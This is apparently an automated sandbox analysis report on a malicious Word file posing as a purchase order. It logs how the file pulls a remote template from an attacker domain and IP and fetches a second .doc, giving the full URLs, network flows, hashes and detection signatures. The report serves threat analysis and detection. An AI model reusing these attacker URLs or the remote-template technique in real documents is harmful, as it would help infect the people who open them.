Windows Analysis Report
PO NAHK22012FA000000.docx

Overview

General Information

Sample name:	PO NAHK22012FA000000.docx
Analysis ID:	1540372
MD5:	48dd0e8d2647a5d093f64f186dcac877
SHA1:	258650076b605d2d46984016ad2986e7e41b6b9e
SHA256:	e24a47e78d936fa0738d80c11910fbdf8d90d384c7584c355d56a94252323f16
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Microsoft Office launches external ms-search protocol handler (WebDAV)

Contains an external reference to another file

Office viewer loads remote template

Document misses a certain OLE stream usually present in this Microsoft Office document type

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Classification

Signatures

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TWC-12271-NYCUS TWC-12271-NYCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 62.151.179.85Connection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE9AD520-4EB5-4337-9147-8A3BC8A776F2}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 62.151.179.85Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: u4u.kids

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:50:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:50:14 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal56.evad.winDOCX@1/16@7/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ NAHK22012FA000000.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR894B.tmp

Jump to behavior

Source: PO NAHK22012FA000000.docx	OLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docx	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true

Source: PO NAHK22012FA000000.docx	OLE document summary: title field not present or empty
Source: PO NAHK22012FA000000.docx	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: PO NAHK22012FA000000.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\PO NAHK22012FA000000.docx

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/media/image3.emf
Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/media/image2.emf
Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/media/image2.emf
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/media/image3.emf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: PO NAHK22012FA000000.docx

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRoot

Jump to behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: https://u4u.kids/rxbtfa?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
